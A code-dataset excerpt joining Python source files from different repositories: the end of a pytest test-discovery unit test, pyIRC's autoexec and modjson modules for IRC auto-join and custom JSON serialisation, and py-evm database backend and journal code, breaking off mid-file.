doctestfile = fix_path('./x/test_doctest.txt')
relfile = fix_path('./x/y/z/test_eggs.py')
alltests = [
TestInfo(
id=doctestfile + '::test_doctest.txt',
name='test_doctest.txt',
path=TestPath(
root=testroot,
relfile=doctestfile,
func=None,
),
source='{}:{}'.format(doctestfile, 0),
markers=[],
parentid=doctestfile,
),
# With --doctest-modules
TestInfo(
id=relfile + '::test_eggs',
name='test_eggs',
path=TestPath(
root=testroot,
relfile=relfile,
func=None,
),
source='{}:{}'.format(relfile, 0),
markers=[],
parentid=relfile,
),
TestInfo(
id=relfile + '::test_eggs.TestSpam',
name='test_eggs.TestSpam',
path=TestPath(
root=testroot,
relfile=relfile,
func=None,
),
source='{}:{}'.format(relfile, 12),
markers=[],
parentid=relfile,
),
TestInfo(
id=relfile + '::test_eggs.TestSpam.TestEggs',
name='test_eggs.TestSpam.TestEggs',
path=TestPath(
root=testroot,
relfile=relfile,
func=None,
),
source='{}:{}'.format(relfile, 27),
markers=[],
parentid=relfile,
),
]
allparents = [
[(doctestfile, 'test_doctest.txt', 'file'),
(fix_path('./x'), 'x', 'folder'),
('.', testroot, 'folder'),
],
[(relfile, 'test_eggs.py', 'file'),
(fix_path('./x/y/z'), 'z', 'folder'),
(fix_path('./x/y'), 'y', 'folder'),
(fix_path('./x'), 'x', 'folder'),
('.', testroot, 'folder'),
],
[(relfile, 'test_eggs.py', 'file'),
(fix_path('./x/y/z'), 'z', 'folder'),
(fix_path('./x/y'), 'y', 'folder'),
(fix_path('./x'), 'x', 'folder'),
('.', testroot, 'folder'),
],
[(relfile, 'test_eggs.py', 'file'),
(fix_path('./x/y/z'), 'z', 'folder'),
(fix_path('./x/y'), 'y', 'folder'),
(fix_path('./x'), 'x', 'folder'),
('.', testroot, 'folder'),
],
]
expected = [test._replace(id=_fix_nodeid(test.id),
parentid=_fix_nodeid(test.parentid))
for test in alltests]
discovered = DiscoveredTests()
for test, parents in zip(alltests, allparents):
discovered.add_test(test, parents)
tests = list(discovered)
parents = discovered.parents
self.maxDiff = None
self.assertEqual(tests, expected)
self.assertEqual(parents, [
ParentInfo(
id='.',
kind='folder',
name=testroot,
),
ParentInfo(
id='./x',
kind='folder',
name='x',
root=testroot,
relpath=fix_path('./x'),
parentid='.',
),
ParentInfo(
id='./x/test_doctest.txt',
kind='file',
name='test_doctest.txt',
root=testroot,
relpath=fix_path(doctestfile),
parentid='./x',
),
ParentInfo(
id='./x/y',
kind='folder',
name='y',
root=testroot,
relpath=fix_path('./x/y'),
parentid='./x',
),
ParentInfo(
id='./x/y/z',
kind='folder',
name='z',
root=testroot,
relpath=fix_path('./x/y/z'),
parentid='./x/y',
),
ParentInfo(
id='./x/y/z/test_eggs.py',
kind='file',
name='test_eggs.py',
root=testroot,
relpath=fix_relpath(relfile),
parentid='./x/y/z',
),
])
def test_nested_suite_simple(self):
testroot = fix_path('/a/b/c')
relfile = fix_path('./test_eggs.py')
alltests = [
TestInfo(
id=relfile + '::TestOuter::TestInner::test_spam',
name='test_spam',
path=TestPath(
root=testroot,
relfile=relfile,
func='TestOuter.TestInner.test_spam',
),
source='{}:{}'.format(relfile, 10),
markers=None,
parentid=relfile + '::TestOuter::TestInner',
),
TestInfo(
id=relfile + '::TestOuter::TestInner::test_eggs',
name='test_eggs',
path=TestPath(
root=testroot,
relfile=relfile,
func='TestOuter.TestInner.test_eggs',
),
source='{}:{}'.format(relfile, 21),
markers=None,
parentid=relfile + '::TestOuter::TestInner',
),
]
allparents= [
[(relfile + '::TestOuter::TestInner', 'TestInner', 'suite'),
(relfile + '::TestOuter', 'TestOuter', 'suite'),
(relfile, 'test_eggs.py', 'file'),
('.', testroot, 'folder'),
],
[(relfile + '::TestOuter::TestInner', 'TestInner', 'suite'),
(relfile + '::TestOuter', 'TestOuter', 'suite'),
(relfile, 'test_eggs.py', 'file'),
('.', testroot, 'folder'),
],
]
expected = [test._replace(id=_fix_nodeid(test.id),
parentid=_fix_nodeid(test.parentid))
for test in alltests]
discovered = DiscoveredTests()
for test, parents in zip(alltests, allparents):
discovered.add_test(test, parents)
tests = list(discovered)
parents = discovered.parents
self.maxDiff = None
self.assertEqual(tests, expected)
self.assertEqual(parents, [
ParentInfo(
id='.',
kind='folder',
name=testroot,
),
ParentInfo(
id='./test_eggs.py',
kind='file',
name='test_eggs.py',
root=testroot,
relpath=fix_relpath(relfile),
parentid='.'
),
ParentInfo(
id='./test_eggs.py::TestOuter',
kind='suite',
name='TestOuter',
root=testroot,
parentid='./test_eggs.py',
),
ParentInfo(
id='./test_eggs.py::TestOuter::TestInner',
kind='suite',
name='TestInner',
root=testroot,
parentid='./test_eggs.py::TestOuter',
),
])
```
|
{
"source": "jesterpm/pyIRC",
"score": 2
}
|
#### File: jesterpm/pyIRC/autoexec.py
```python
import re
import irc
import fnmatch
def AutoexecReload(old_ax):
ax = Autoexec()
for (context, conf) in old_ax.networks.items():
context.rmAddon(old_ax)
context.addAddon(ax, **conf.__dict__)
return ax
class Autoexec(object):
def __init__(self):
self.networks = {}
self._rejoinchannels = {}
# Saved channels for when a connection is lost
def onAddonAdd(self, context, label, onconnect=[], onregister=[], autojoin=[], usermodes=None, nsautojoin=[], nsmatch=None, wallet=None, opername=None, opermodes=None, snomasks=None, operexec=None, operjoin=[], autorejoin=True):
labels = [v.label for v in self.networks.values()]
if label in labels:
raise BaseException, "Label already exists"
if context in self.networks.keys():
raise BaseException, "Network already exists"
self.networks[context] = irc.Config(
self, label=label, onconnect=list(onconnect), onregister=list(onregister), autojoin=irc.ChanList(autojoin, context=context),
usermodes=usermodes, nsautojoin=irc.ChanList(nsautojoin, context=context), nsmatch=nsmatch, wallet=wallet,
opername=opername, opermodes=opermodes, snomasks=snomasks, operexec=operexec, operjoin=irc.ChanList(operjoin, context=context), autorejoin=autorejoin)
self._rejoinchannels[context] = None
return self.networks[context]
def onDisconnect(self, context, expected):
conf = self.networks[context]
if conf.autorejoin and not expected and context.identity and context.identity.channels:
self._rejoinchannels[context] = irc.ChanList(
context.identity.channels, context=context) # Store a *copy* of the list of channels
def onQuit(self, context, user, quitmsg):
if user == context.identity and not context._quitexpected:
# Bot received a QUIT message for itself, and was not expected.
self.onDisconnect(context, False)
def onAddonRem(self, context):
del self.networks[context], self._rejoinchannels[context]
def onConnect(self, context):
conf = self.networks[context]
if conf.onconnect:
for line in conf.onconnect:
context.raw(line, origin=self)
def onRegistered(self, context):
conf = self.networks[context]
if conf.onregister:
for line in conf.onregister:
context.raw(line, origin=self)
if conf.usermodes:
context.raw("MODE %s %s" %
(context.identity.nick, conf.usermodes), origin=self)
if conf.opername and conf.wallet and "%s/opers/%s" % (conf.label, conf.opername) in conf.wallet.keys():
context.raw("OPER %s %s" %
(conf.opername, conf.wallet["%s/opers/%s" % (conf.label, conf.opername)]), origin=self)
if conf.autojoin:
conf.autojoin.join(origin=self)
if conf.autorejoin and self._rejoinchannels[context]:
rejoin = irc.ChanList([channel for channel in self._rejoinchannels[
context] if channel not in conf.autojoin + conf.nsautojoin + conf.operjoin], context=context)
if len(rejoin):
rejoin.join(origin=self)
self._rejoinchannels[context] = None
def on381(self, context, line, origin, target, params, extinfo):
conf = self.networks[context]
if conf.operexec:
for line in conf.operexec:
context.raw(line, origin=self)
if conf.opermodes:
context.raw("MODE %s %s" %
(context.identity.nick, conf.opermodes), origin=self)
if conf.snomasks:
context.raw("MODE %s +s %s" %
(context.identity.nick, conf.snomasks), origin=self)
if conf.operjoin:
conf.operjoin.join(origin=self)
def onPrivNotice(self, context, origin, msg):
conf = self.networks[context]
if type(origin) == irc.User and origin.nick.lower() == "nickserv":
if re.match("This nickname is registered( and protected)?", msg) and (not conf.nsmatch or fnmatch.fnmatch("%s!%s@%s" % (origin.nick, origin.username, origin.host), conf.nsmatch)) and conf.wallet and "%s/NickServ/%s" % (conf.label, context.identity.nick.lower()) in conf.wallet.keys():
origin.msg("identify %s" %
conf.wallet["%s/NickServ/%s" % (conf.label, context.identity.nick.lower())])
if re.match("You are now identified", msg):
if conf.nsautojoin:
conf.nsautojoin.join(origin=self)
def on900(self, context, line, origin, target, params, extinfo):
conf = self.networks[context]
if conf.nsautojoin:
conf.nsautojoin.join(origin=self)
```
#### File: jesterpm/pyIRC/modjson.py
```python
import json
import inspect
import re
import importlib
import collections
import inspect
import new
from json.decoder import errmsg
from json.encoder import py_encode_basestring_ascii, ESCAPE, ESCAPE_ASCII, HAS_UTF8, ESCAPE_DCT, INFINITY, FLOAT_REPR, encode_basestring, encode_basestring_ascii
FLAGS = re.VERBOSE | re.MULTILINE | re.DOTALL
NUMBER_RE = re.compile(r'(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?', FLAGS)
REF_RE = re.compile(
r'<([A-Z0-9_]+(?:\[[0-9]+(?:,[0-9]+)*\])?(?:\.[A-Z0-9_]+(?:\[[0-9]+(?:,[0-9]+)*\])?)*)>', flags=FLAGS | re.I)
PATH_RE = re.compile(
r'([A-Z0-9_]+)(?:\[([0-9]+(?:,[0-9]+)*)\])?', flags=FLAGS | re.I)
WHITESPACE = re.compile(r'[ \t\n\r]*', FLAGS)
WHITESPACE_STR = ' \t\n\r'
match_number = NUMBER_RE.match
match_reference = REF_RE.match
datetime_regex = re.compile(
'\"dt\((\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2}):(\d{2})Z\)\"')
timedelta_regex = re.compile('\"td\((\d+)\)\"')
#parse_object = context.parse_object
#parse_array = context.parse_array
#parse_string = context.parse_string
#match_number = NUMBER_RE.match
#match_reference = REF_RE.match
#encoding = context.encoding
#strict = context.strict
#parse_float = context.parse_float
#parse_int = context.parse_int
#parse_constant = context.parse_constant
#object_hook = context.object_hook
#object_pairs_hook = context.object_pairs_hook
class ModJSONDecoder(json.JSONDecoder):
def __init__(self, encoding=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, strict=True,
object_pairs_hook=None):
"""``encoding`` determines the encoding used to interpret any ``str``
objects decoded by this instance (utf-8 by default). It has no
effect when decoding ``unicode`` objects.
Note that currently only encodings that are a superset of ASCII work,
strings of other encodings should be passed in as ``unicode``.
``object_hook``, if specified, will be called with the result
of every JSON object decoded and its return value will be used in
place of the given ``dict``. This can be used to provide custom
deserializations (e.g. to support JSON-RPC class hinting).
``object_pairs_hook``, if specified will be called with the result of
every JSON object decoded with an ordered list of pairs. The return
value of ``object_pairs_hook`` will be used instead of the ``dict``.
This feature can be used to implement custom decoders that rely on the
order that the key and value pairs are decoded (for example,
collections.OrderedDict will remember the order of insertion). If
``object_hook`` is also defined, the ``object_pairs_hook`` takes
priority.
``parse_float``, if specified, will be called with the string
of every JSON float to be decoded. By default this is equivalent to
float(num_str). This can be used to use another datatype or parser
for JSON floats (e.g. decimal.Decimal).
``parse_int``, if specified, will be called with the string
of every JSON int to be decoded. By default this is equivalent to
int(num_str). This can be used to use another datatype or parser
for JSON integers (e.g. float).
``parse_constant``, if specified, will be called with one of the
following strings: -Infinity, Infinity, NaN.
This can be used to raise an exception if invalid JSON numbers
are encountered.
If ``strict`` is false (true is the default), then control
characters will be allowed inside strings. Control characters in
this context are those with character codes in the 0-31 range,
including ``'\\t'`` (tab), ``'\\n'``, ``'\\r'`` and ``'\\0'``.
"""
self.encoding = encoding
self.object_pairs_hook = object_pairs_hook
self.parse_float = parse_float or float
self.parse_int = parse_int or int
self.parse_constant = parse_constant or json.decoder._CONSTANTS.__getitem__
self.strict = strict
self.parse_string = json.decoder.scanstring
self.object_dict_hook = None
def object_hook(self, d):
if 'class' in d:
class_path = d.pop('class')
modname, clsname = class_path.rsplit(".", 1)
#module_name = d.pop('__module__')
module = __import__(modname)
class_ = getattr(module, clsname)
args = dict((key.encode('ascii'), value)
for key, value in d.items())
inst = class_(**args)
else:
inst = d
return inst
def parse_object(self, s_and_end, root, working, _w=WHITESPACE.match, _ws=WHITESPACE_STR):
s, end = s_and_end
pairs = []
pairs_append = pairs.append
# Use a slice to prevent IndexError from being raised, the following
# check will raise a more specific ValueError if the string is empty
nextchar = s[end:end + 1]
# Normally we expect nextchar == '"'
if nextchar != '"':
if nextchar in _ws:
end = _w(s, end).end()
nextchar = s[end:end + 1]
# Trivial empty object
if nextchar == '}':
if self.object_dict_hook is not None:
result = self.object_dict_hook(working)
return result, end + 1
if self.object_hook is not None:
working = self.object_hook(working)
return working, end + 1
elif nextchar != '"':
raise ValueError(errmsg(
"Expecting property name enclosed in double quotes", s, end))
end += 1
while True:
key, end = self.parse_string(s, end)
# To skip some function call overhead we optimize the fast paths where
# the JSON key separator is ": " or just ":".
if s[end:end + 1] != ':':
end = _w(s, end).end()
if s[end:end + 1] != ':':
raise ValueError(errmsg("Expecting ':' delimiter", s, end))
end += 1
try:
if s[end] in _ws:
end += 1
if s[end] in _ws:
end = _w(s, end + 1).end()
except IndexError:
pass
try:
nextchar = s[end]
except IndexError:
raise ValueError(errmsg("Expecting object", s, end))
if nextchar == '{':
nextitem = {}
elif nextchar == '[':
nextitem = []
else:
nextitem = None
working[key] = nextitem
try:
value, end = self.scan_once(s, end, root, nextitem)
except StopIteration:
raise ValueError(errmsg("Expecting object", s, end))
# pairs_append((key, value))
working[key] = value
try:
nextchar = s[end]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end]
except IndexError:
nextchar = ''
end += 1
if nextchar == '}':
break
elif nextchar != ',':
raise ValueError(errmsg("Expecting ',' delimiter", s, end - 1))
try:
nextchar = s[end]
if nextchar in _ws:
end += 1
nextchar = s[end]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end]
except IndexError:
nextchar = ''
end += 1
if nextchar != '"':
raise ValueError(errmsg(
"Expecting property name enclosed in double quotes", s, end - 1))
if self.object_pairs_hook is not None:
result = self.object_dict_hook(dict)
return result, end
if self.object_hook is not None:
working = self.object_hook(working)
return working, end
def parse_array(self, s_and_end, root, working, _w=WHITESPACE.match, _ws=WHITESPACE_STR):
s, end = s_and_end
nextchar = s[end:end + 1]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end:end + 1]
# Look-ahead for trivial empty array
if nextchar == ']':
return working, end + 1
_append = working.append
while True:
try:
nextchar = s[end]
except IndexError:
raise ValueError(errmsg("Expecting object", s, end))
if nextchar == '{':
nextitem = {}
elif nextchar == '[':
nextitem = []
else:
nextitem = None
_append(nextitem)
try:
value, end = self.scan_once(s, end, root, nextitem)
except StopIteration:
raise ValueError(errmsg("Expecting object", s, end))
if value is not nextitem:
del working[-1]
_append(value)
nextchar = s[end:end + 1]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end:end + 1]
end += 1
if nextchar == ']':
break
elif nextchar != ',':
raise ValueError(errmsg("Expecting ',' delimiter", s, end))
try:
if s[end] in _ws:
end += 1
if s[end] in _ws:
end = _w(s, end + 1).end()
except IndexError:
pass
return working, end
def scan_once(self, string, idx, root, working):
try:
nextchar = string[idx]
except IndexError:
raise StopIteration
if nextchar == '"':
return self.parse_string(string, idx + 1)
elif nextchar == '{':
return self.parse_object((string, idx + 1), root, working)
elif nextchar == '[':
return self.parse_array((string, idx + 1), root, working)
elif nextchar == 'n' and string[idx:idx + 4] == 'null':
return None, idx + 4
elif nextchar == 't' and string[idx:idx + 4] == 'true':
return True, idx + 4
elif nextchar == 'f' and string[idx:idx + 5] == 'false':
return False, idx + 5
m = match_number(string, idx)
if m is not None:
integer, frac, exp = m.groups()
if frac or exp:
res = self.parse_float(integer + (frac or '') + (exp or ''))
else:
res = self.parse_int(integer)
return res, m.end()
r = match_reference(string, idx)
if r is not None:
refname = r.groups()
obj = root
for name in refname[0].split("."):
name, indices = PATH_RE.match(name).groups()
if name:
if type(obj) == dict:
obj = obj[name]
elif type(obj) == list:
obj = obj[int(name)]
else:
obj = getattr(obj, name)
if indices:
for index in indices.split("."):
obj = obj[int(index)]
return obj, r.end()
elif nextchar == 'N' and string[idx:idx + 3] == 'NaN':
return self.parse_constant('NaN'), idx + 3
elif nextchar == 'I' and string[idx:idx + 8] == 'Infinity':
return self.parse_constant('Infinity'), idx + 8
elif nextchar == '-' and string[idx:idx + 9] == '-Infinity':
return self.parse_constant('-Infinity'), idx + 9
else:
raise StopIteration
def decode(self, s, _w=WHITESPACE.match):
"""Return the Python representation of ``s`` (a ``str`` or ``unicode``
instance containing a JSON document)
"""
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
end = _w(s, end).end()
if end != len(s):
raise ValueError(errmsg("Extra data", s, end, len(s)))
return obj
def raw_decode(self, s, idx=0):
"""Decode a JSON document from ``s`` (a ``str`` or ``unicode``
beginning with a JSON document) and return a 2-tuple of the Python
representation and the index in ``s`` where the document ended.
This can be used to decode a JSON document from a string that may
have extraneous data at the end.
"""
try:
nextchar = s[idx]
except IndexError:
raise ValueError(errmsg("Expecting object", s, idx))
if nextchar == '{':
root = {}
elif nextchar == '[':
root = []
else:
root = None
try:
obj, end = self.scan_once(s, idx, root, root)
except StopIteration:
raise ValueError("No JSON object could be decoded")
return obj, end
class ModJSONEncoder(object):
"""Extensible JSON <http://json.org> encoder for Python data structures.
Supports the following objects and types by default:
+-------------------+---------------+
| Python | JSON |
+===================+===============+
| dict | object |
+-------------------+---------------+
| list, tuple | array |
+-------------------+---------------+
| str, unicode | string |
+-------------------+---------------+
| int, long, float | number |
+-------------------+---------------+
| True | true |
+-------------------+---------------+
| False | false |
+-------------------+---------------+
| None | null |
+-------------------+---------------+
To extend this to recognize other objects, subclass and implement a
``.default()`` method with another method that returns a serializable
object for ``o`` if possible, otherwise it should call the superclass
implementation (to raise ``TypeError``).
"""
item_separator = ', '
key_separator = ': '
def __init__(self, skipkeys=False, ensure_ascii=True,
check_circular=True, allow_nan=True, sort_keys=False,
indent=None, separators=None, encoding='utf-8', default=None):
"""Constructor for JSONEncoder, with sensible defaults.
If skipkeys is false, then it is a TypeError to attempt
encoding of keys that are not str, int, long, float or None. If
skipkeys is True, such items are simply skipped.
If *ensure_ascii* is true (the default), all non-ASCII
characters in the output are escaped with \uXXXX sequences,
and the results are str instances consisting of ASCII
characters only. If ensure_ascii is False, a result may be a
unicode instance. This usually happens if the input contains
unicode strings or the *encoding* parameter is used.
If check_circular is true, then lists, dicts, and custom encoded
objects will be checked for circular references during encoding to
prevent an infinite recursion (which would cause an OverflowError).
Otherwise, no such check takes place.
If allow_nan is true, then NaN, Infinity, and -Infinity will be
encoded as such. This behavior is not JSON specification compliant,
but is consistent with most JavaScript based encoders and decoders.
Otherwise, it will be a ValueError to encode such floats.
If sort_keys is true, then the output of dictionaries will be
sorted by key; this is useful for regression tests to ensure
that JSON serializations can be compared on a day-to-day basis.
If indent is a non-negative integer, then JSON array
elements and object members will be pretty-printed with that
indent level. An indent level of 0 will only insert newlines.
None is the most compact representation. Since the default
item separator is ', ', the output might include trailing
whitespace when indent is specified. You can use
separators=(',', ': ') to avoid this.
If specified, separators should be a (item_separator, key_separator)
tuple. The default is (', ', ': '). To get the most compact JSON
representation you should specify (',', ':') to eliminate whitespace.
If specified, default is a function that gets called for objects
that can't otherwise be serialized. It should return a JSON encodable
version of the object or raise a ``TypeError``.
If encoding is not None, then all input strings will be
transformed into unicode using that encoding prior to JSON-encoding.
The default is UTF-8.
"""
self.skipkeys = skipkeys
self.ensure_ascii = ensure_ascii
self.check_circular = check_circular
self.allow_nan = allow_nan
self.sort_keys = sort_keys
self.indent = indent
if separators is not None:
self.item_separator, self.key_separator = separators
if default is not None:
self.default = default
self.encoding = encoding
if self.ensure_ascii:
self._encoder = encode_basestring_ascii
else:
self._encoder = encode_basestring
if self.encoding != 'utf-8':
def _encoder(o, _orig_encoder=self._encoder, _encoding=self.encoding):
if isinstance(o, str):
o = o.decode(_encoding)
return _orig_encoder(o)
self._encoder = _encoder
def default(self, o, refs, path):
"""Implement this method in a subclass such that it returns
a serializable object for ``o``, or calls the base implementation
(to raise a ``TypeError``).
For example, to support arbitrary iterators, you could
implement default like this::
def default(self, o):
try:
iterable = iter(o)
except TypeError:
pass
else:
return list(iterable)
# Let the base class default method raise the TypeError
return JSONEncoder.default(self, o)
"""
if "json" in dir(o) and callable(o.json):
conf = o.json()
else:
conf = collections.OrderedDict()
conf["class"] = "{o.__class__.__module__}.{o.__class__.__name__}".format(
**vars())
if "__init__" in dir(o) and type(o.__init__) == new.instancemethod:
try:
arginspect = inspect.getargspec(o.__init__)
except:
raise TypeError(repr(o) + " is not JSON serializable")
if arginspect.defaults:
requiredargs = arginspect.args[
1:len(arginspect.args) - len(arginspect.defaults)]
argswithdefaults = arginspect.args[
len(arginspect.args) - len(arginspect.defaults):]
defaultvalues = arginspect.defaults
else:
requiredargs = arginspect.args[1:]
argswithdefaults = []
defaultvalues = []
for key in requiredargs:
try:
conf[key] = getattr(o, key)
except AttributeError:
print key
print refs.keys()
raise TypeError(
repr(o) + " is not JSON serializable (Cannot recover required argument '%s')" % key)
for key, default in zip(argswithdefaults, defaultvalues):
try:
value = getattr(o, key)
if value != default:
conf[key] = getattr(o, key)
except AttributeError:
pass
if path and not isinstance(conf, (int, long, bool, basestring)) and conf is not None:
pathstr = str(path[0])
numindices = []
for index in path[1:]:
if type(index) == int:
numindices.append(str(index))
else:
if numindices:
pathstr += "[%s]" % (",".join(numindices))
numindices = []
pathstr += ".%s" % index
if numindices:
pathstr += "[%s]" % (",".join(numindices))
numindices = []
if pathstr not in refs.keys():
refs[pathstr] = o
return conf
def encode(self, o):
"""Return a JSON string representation of a Python data structure.
>>> JSONEncoder().encode({"foo": ["bar", "baz"]})
'{"foo": ["bar", "baz"]}'
"""
# This is for extremely simple cases and benchmarks.
if isinstance(o, basestring):
if isinstance(o, str):
_encoding = self.encoding
if (_encoding is not None
and not (_encoding == 'utf-8')):
o = o.decode(_encoding)
if self.ensure_ascii:
return encode_basestring_ascii(o)
else:
return encode_basestring(o)
# This doesn't pass the iterator directly to ''.join() because the
# exceptions aren't as detailed. The list call should be roughly
# equivalent to the PySequence_Fast that ''.join() would do.
chunks = self.iterencode(o, {}, _one_shot=True)
if not isinstance(chunks, (list, tuple)):
chunks = list(chunks)
return ''.join(chunks)
def iterencode(self, o, refs, _one_shot=False):
"""Encode the given object and yield each string
representation as available.
For example::
for chunk in JSONEncoder().iterencode(bigobject):
mysocket.write(chunk)
"""
if self.check_circular:
markers = {}
else:
markers = None
def floatstr(o, allow_nan=self.allow_nan,
_repr=FLOAT_REPR, _inf=INFINITY, _neginf=-INFINITY):
# Check for specials. Note that this type of test is processor
# and/or platform-specific, so do tests which don't depend on the
# internals.
if o != o:
text = 'NaN'
elif o == _inf:
text = 'Infinity'
elif o == _neginf:
text = '-Infinity'
else:
return _repr(o)
if not allow_nan:
raise ValueError(
"Out of range float values are not JSON compliant: " +
repr(o))
return text
# if (_one_shot and c_make_encoder is not None
# and self.indent is None and not self.sort_keys):
#_iterencode = c_make_encoder(
#markers, self.default, _encoder, self.indent,
#self.key_separator, self.item_separator, self.sort_keys,
# self.skipkeys, self.allow_nan)
# else:
#_iterencode = _make_iterencode(
#markers, self.default, _encoder, self.indent, floatstr,
#self.key_separator, self.item_separator, self.sort_keys,
# self.skipkeys, _one_shot)
return self._iterencode(o, 0, markers, refs, ())
def _iterencode(self, o, _current_indent_level, markers, refs, path):
if isinstance(o, basestring):
yield self._encoder(o)
elif o is None:
yield 'null'
elif o is True:
yield 'true'
elif o is False:
yield 'false'
elif isinstance(o, (int, long)):
yield str(o)
elif isinstance(o, float):
yield _floatstr(o)
else:
ref = self._iterencode_ref(
o, _current_indent_level, markers, refs, path)
if ref:
yield ref
elif isinstance(o, (list, tuple)) and "json" not in dir(o):
for chunk in self._iterencode_list(o, _current_indent_level, markers, refs, path):
yield chunk
elif isinstance(o, dict) and "json" not in dir(o):
for chunk in self._iterencode_dict(o, _current_indent_level, markers, refs, path):
yield chunk
else:
if markers is not None:
markerid = id(o)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = o
o = self.default(o, refs, path)
for chunk in self._iterencode(o, _current_indent_level, markers, refs, path):
yield chunk
if markers is not None:
del markers[markerid]
def _iterencode_ref(self, o, _current_indent_level, markers, refs, path):
for key, value in refs.items():
if value is o:
return "<%s>" % key
def _iterencode_list(self, lst, _current_indent_level, markers, refs, path):
if path:
pathstr = str(path[0])
numindices = []
for index in path[1:]:
if type(index) == int:
numindices.append(str(index))
else:
if numindices:
pathstr += "[%s]" % (",".join(numindices))
numindices = []
pathstr += ".%s" % index
if numindices:
pathstr += "[%s]" % (",".join(numindices))
numindices = []
if pathstr not in refs.keys():
refs[pathstr] = lst
if not lst:
yield '[]'
return
if markers is not None:
markerid = id(lst)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = lst
buf = '['
if self.indent is not None:
_current_indent_level += 1
newline_indent = '\n' + \
(' ' * (self.indent * _current_indent_level))
separator = self.item_separator + newline_indent
buf += newline_indent
else:
newline_indent = None
separator = self.item_separator
first = True
for (k, value) in enumerate(lst):
if first:
first = False
else:
buf = separator
if isinstance(value, basestring):
yield buf + self._encoder(value)
elif value is None:
yield buf + 'null'
elif value is True:
yield buf + 'true'
elif value is False:
yield buf + 'false'
elif isinstance(value, (int, long)):
yield buf + str(value)
elif isinstance(value, float):
yield buf + _floatstr(value)
else:
ref = self._iterencode_ref(
value, _current_indent_level, markers, refs, path)
if ref and False:
yield buf + ref
else:
yield buf
if isinstance(value, (list, tuple)) and "json" not in dir(value):
chunks = self._iterencode_list(
value, _current_indent_level, markers, refs, path + (k,))
elif isinstance(value, dict) and "json" not in dir(value):
chunks = self._iterencode_dict(
value, _current_indent_level, markers, refs, path + (k,))
else:
chunks = self._iterencode(
value, _current_indent_level, markers, refs, path + (k,))
for chunk in chunks:
yield chunk
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + (' ' * (self.indent * _current_indent_level))
yield ']'
if markers is not None:
del markers[markerid]
def _iterencode_dict(self, dct, _current_indent_level, markers, refs, path):
if path:
pathstr = str(path[0])
numindices = []
for index in path[1:]:
if type(index) == int:
numindices.append(str(index))
else:
if numindices:
pathstr += "[%s]" % (",".join(numindices))
numindices = []
pathstr += ".%s" % index
if numindices:
pathstr += "[%s]" % (",".join(numindices))
numindices = []
if pathstr not in refs.keys():
refs[pathstr] = dct
if not dct:
yield '{}'
return
if markers is not None:
markerid = id(dct)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = dct
yield '{'
if self.indent is not None:
_current_indent_level += 1
newline_indent = '\n' + \
(' ' * (self.indent * _current_indent_level))
item_separator = self.item_separator + newline_indent
yield newline_indent
else:
newline_indent = None
item_separator = self.item_separator
first = True
if self.sort_keys:
items = sorted(dct.items(), key=lambda kv: kv[0])
else:
items = dct.iteritems()
for key, value in items:
if isinstance(key, basestring):
pass
# JavaScript is weakly typed for these, so it makes sense to
# also allow them. Many encoders seem to do something like this.
elif isinstance(key, float):
key = _floatstr(key)
elif key is True:
key = 'true'
elif key is False:
key = 'false'
elif key is None:
key = 'null'
elif isinstance(key, (int, long)):
key = str(key)
elif self.skipkeys:
continue
else:
raise TypeError("key " + repr(key) + " is not a string")
if first:
first = False
else:
yield item_separator
yield self._encoder(key)
yield self.key_separator
if isinstance(value, basestring):
yield self._encoder(value)
elif value is None:
yield 'null'
elif value is True:
yield 'true'
elif value is False:
yield 'false'
elif isinstance(value, (int, long)):
yield str(value)
elif isinstance(value, float):
yield _floatstr(value)
else:
ref = self._iterencode_ref(
value, _current_indent_level, markers, refs, path)
if ref:
yield ref
else:
if isinstance(value, (list, tuple)) and "json" not in dir(value):
chunks = self._iterencode_list(
value, _current_indent_level, markers, refs, path + (key,))
elif isinstance(value, dict) and "json" not in dir(value):
chunks = self._iterencode_dict(
value, _current_indent_level, markers, refs, path + (key,))
else:
chunks = self._iterencode(
value, _current_indent_level, markers, refs, path + (key,))
for chunk in chunks:
yield chunk
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + (' ' * (self.indent * _current_indent_level))
yield '}'
if markers is not None:
del markers[markerid]
```
|
{
"source": "jestersimpps/py-evm",
"score": 2
}
|
#### File: evm/db/__init__.py
```python
import os
from evm.utils.module_loading import (
import_string,
)
DEFAULT_DB_BACKEND = 'evm.db.backends.memory.MemoryDB'
def get_db_backend_class(import_path=None):
if import_path is None:
import_path = os.environ.get(
'CHAIN_DB_BACKEND_CLASS',
DEFAULT_DB_BACKEND,
)
return import_string(import_path)
def get_db_backend(import_path=None, **init_kwargs):
backend_class = get_db_backend_class(import_path)
return backend_class(**init_kwargs)
```
#### File: evm/db/journal.py
```python
import uuid
from cytoolz import (
merge,
)
from evm.db.backends.base import BaseDB
from evm.exceptions import ValidationError
class Journal(object):
"""
A Journal is an ordered list of checkpoints. A checkpoint is a dictionary
of database keys and values. The values are the "original" value of that
key at the time the checkpoint was created.
Checkpoints are referenced by a random uuid4.
"""
checkpoints = None
def __init__(self):
# contains an array of `uuid4` instances
self.checkpoints = []
# contains a mapping from all of the `uuid4` in the `checkpoints` array
# to a dictionary of key:value pairs wher the `value` is the original
# value for the given key at the moment this checkpoint was created.
self.journal_data = {}
@property
def latest_id(self):
"""
Returns the checkpoint_id of the latest checkpoint
"""
return self.checkpoints[-1]
@property
def latest(self):
"""
Returns the dictionary of db keys and values for the latest checkpoint.
"""
return self.journal_data[self.latest_id]
@latest.setter
def latest(self, value):
"""
Setter for updating the *latest* checkpoint.
"""
self.journal_data[self.latest_id] = value
def add(self, key, value):
"""
Adds the given key and value to the latest checkpoint.
"""
if not self.checkpoints:
# If no checkpoints exist we don't need to track history.
return
elif key in self.latest:
# If the key is already in the latest checkpoint we should not
# overwrite it.
return
self.latest[key] = value
def create_checkpoint(self):
"""
Creates a new checkpoint. Checkpoints are referenced by a random uuid4
to prevent collisions between multiple checkpoints.
"""
